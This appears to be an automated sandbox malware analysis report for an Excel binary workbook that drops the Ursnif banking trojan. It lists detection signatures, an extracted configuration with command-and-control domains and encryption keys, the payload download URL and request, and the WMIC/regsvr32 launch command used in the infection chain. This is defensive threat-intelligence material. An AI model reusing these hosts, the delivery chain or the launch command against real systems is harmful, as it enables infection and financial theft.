Windows Analysis Report inquiry[2021.09.23_12-51].xlsb

Overview

General Information

Sample Name: inquiry[2021.09.23_12-51].xlsb
Analysis ID: 507191
MD5: d5dedf5221391bc183c80173ed5f4279
SHA1: bc48802d095a79a9fb8196d35506c4862c937936
SHA256: f2be1c567425b843b8deec064cd9f747d74f4ae5e15d026fcb5b26549ae3fba9
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Document exploit detected (drops PE files)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Drops PE files to the user root directory
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Contains functionality to create processes via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious WMI Execution
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Abnormal high CPU Usage
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Yara detected Xls With Macro 4.0
Registers a DLL
Drops PE files to the user directory
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "fvJh27FBcY4iDmo8nCK4tyEyXBN1k8EH6mQMtoi0dnoRhrc5m5vdusHgV3SXuoUGMa23szx8nbXoW/YvU6GtHhAvUSB3G4U1Ylw/Xh1SVuQ+LO6TJ5FDzvuvlg0YXcMX9mvaGnH4pn1OZPle0xacxTcEDOgypVqvi4iEgedhkhwkB6rnz9dTsvjARpuFSu5o8A6JPynuxJxchr9FkN/Fno9flLeQF+/qdSiPrlYIV9RsCbTSD+mr7xqZf1jQtWFzbzSlTV418QgPx2KC/w2jRtHZz8hTGrwmHwLbEbIJliSiQj5HSTV5xJYqQZZ7Zy9GbDv8RU+OXsPiONzK+XPKFqwVzJ1/d6Y0ElMnzCE6P84=", "c2_domain": ["apt.updateffboruse.com", "app.updatebrouser.com"], "botnet": "1500", "server": "580", "serpent_key": "H5PUPU7SQqXa0MEJ", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for domain / URL
Source: iqwasithealth.com Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms Metadefender: Detection: 37% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms ReversingLabs: Detection: 67%
Source: C:\Users\Public\codec.dll Metadefender: Detection: 37% Perma Link
Source: C:\Users\Public\codec.dll ReversingLabs: Detection: 67%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_001A3FAB
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 50.87.248.41:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Binary string: c:\885\Thus\Drop\Occur\159_take\King.pdb source: regsvr32.exe, 00000006.00000002.674612184.000000006E2CE000.00000002.00020000.sdmp, a435gfhs109[1].cms.0.dr
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C77FF FindFirstFileExA, 6_2_6E2C77FF

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: codec.dll.0.dr Jump to dropped file
Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: iqwasithealth.com
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 50.87.248.41:443
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 50.87.248.41:443

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: app.updatebrouser.com
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: apt.updateffboruse.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2019/06/a435gfhs109.cms HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: iqwasithealth.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: regsvr32.exe, 00000006.00000002.673589094.0000000000518000.00000004.00000020.sdmp String found in binary or memory: http://apt.updateffboruse.com/_2BYjuB36DkhB1eXLxT/icgzR9URog3BC5Xw8V6nIs/1N91Pgd5TeSwG/3boxgKnH/mcET
Source: regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000003.00000002.415850120.0000000001B60000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.673734417.0000000001D90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673666693.0000000001CC0000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000006.00000002.674022207.00000000021E0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: sharedStrings.bin String found in binary or memory: https://iqwasithealth.com/wp-content/uploads/2019/06/a435gfhs109.cms
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE192CE4.png Jump to behavior
Source: unknown DNS traffic detected: queries for: iqwasithealth.com
Source: global traffic HTTP traffic detected: GET /wp-content/uploads/2019/06/a435gfhs109.cms HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: iqwasithealth.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 50.87.248.41:443 -> 192.168.2.22:49165 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 6_2_001A3FAB

System Summary:

barindex
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll Jump to dropped file
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000003.00000002.415756597.00000000002E4000.00000004.00000040.sdmp Binary or memory string: wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'MAIN=EIVQSAOUS
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2274 6_2_6E2A2274
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A7E30 6_2_001A7E30
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A2654 6_2_001A2654
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A4FA7 6_2_001A4FA7
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2CC841 6_2_6E2CC841
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A121F NtMapViewOfSection, 6_2_6E2A121F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1A1C SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 6_2_6E2A1A1C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2013 GetProcAddress,NtCreateSection,memset, 6_2_6E2A2013
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2495 NtQueryVirtualMemory, 6_2_6E2A2495
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_001A22EC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A8055 NtQueryVirtualMemory, 6_2_001A8055
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
Source: Joe Sandbox View Dropped File: C:\Users\Public\codec.dll D5FE3F6846CA1F5E09E94D66A816C3FC00634013CA7BF9E35361BD185A27C395
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: codec.dll.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: a435gfhs109[1].cms.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll'
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\Public\codec.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:\Users\Public\codec.dll' Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$inquiry[2021.09.23_12-51].xlsb Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRDBFC.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSB@6/4@4/1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A4D62 SetWaitableTimer,CoCreateInstance,CoSetProxyBlanket, 6_2_001A4D62
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A11B8 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 6_2_001A11B8
Source: inquiry[2021.09.23_12-51].xlsb Joe Sandbox Cloud Basic: Detection: clean Score: 0 Perma Link
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: inquiry[2021.09.23_12-51].xlsb Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: c:\885\Thus\Drop\Occur\159_take\King.pdb source: regsvr32.exe, 00000006.00000002.674612184.000000006E2CE000.00000002.00020000.sdmp, a435gfhs109[1].cms.0.dr

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2210 push ecx; ret 6_2_6E2A2219
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A2263 push ecx; ret 6_2_6E2A2273
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A7E1F push ecx; ret 6_2_001A7E2F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_001A7AB0 push ecx; ret 6_2_001A7AB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2AF61D push ecx; ret 6_2_6E2AF622
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2AFE10 push 8B419BFFh; retf 6_2_6E2AFE34
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B024A push esp; retf 6_2_6E2B024C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B4291 push dword ptr [eax+eax-41h]; ret 6_2_6E2B429F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B2B4A push ss; ret 6_2_6E2B2B56
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2AF748 push dword ptr [ebp+ebp*2-0Ch]; ret 6_2_6E2AF7CF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B0B47 push ebp; retf 6_2_6E2B0B49
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B535F push edx; ret 6_2_6E2B536D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2AF817 push dword ptr [ebp+ebp*2-0Ch]; ret 6_2_6E2AF7CF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B2869 push edi; retf 6_2_6E2B2876
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B2073 push esi; ret 6_2_6E2B209D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2B209E push esi; ret 6_2_6E2B209D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C3DE6 push ecx; ret 6_2_6E2C3DF9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F9120 pushad ; iretd 6_2_6E2F914E
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2FAF10 pushad ; ret 6_2_6E2FAF17
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2FA165 push cs; ret 6_2_6E2FA16D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2FAA50 push esp; iretd 6_2_6E2FAA51
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2FA0B9 push edi; iretd 6_2_6E2FA0BD
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1552 LoadLibraryA,GetProcAddress, 6_2_6E2A1552
Registers a DLL
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\Public\codec.dll

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms Jump to dropped file
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\Public\codec.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000006.00000002.674504755.00000000032F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORYSTR
Source: Yara match File source: 6.2.regsvr32.exe.6e2a0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.regsvr32.exe.1c8cbc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.regsvr32.exe.2a59590.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.536445844.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.674417843.0000000002A59000.00000004.00000040.sdmp, type: MEMORY
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wbem\WMIC.exe TID: 2216 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2680 Thread sleep time: -60000s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\regsvr32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a435gfhs109[1].cms Jump to dropped file
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C77FF FindFirstFileExA, 6_2_6E2C77FF

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C7327 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6E2C7327
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2A1552 LoadLibraryA,GetProcAddress, 6_2_6E2A1552
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C5D2F mov eax, dword ptr fs:[00000030h] 6_2_6E2C5D2F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F85B0 mov eax, dword ptr fs:[00000030h] 6_2_6E2F85B0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F80E6 push dword ptr fs:[00000030h] 6_2_6E2F80E6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2F84DF mov eax, dword ptr fs:[00000030h] 6_2_6E2F84DF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C36F2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6E2C36F2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C7327 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6E2C7327
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6E2C3C18 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6E2C3C18

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: app.updatebrouser.com
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: apt.updateffboruse.com
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\Public\codec.dll Jump to behavior
Source: regsvr32.exe, 00000005.00000002.673697461.0000000000990000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.673628198.00000000008C0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
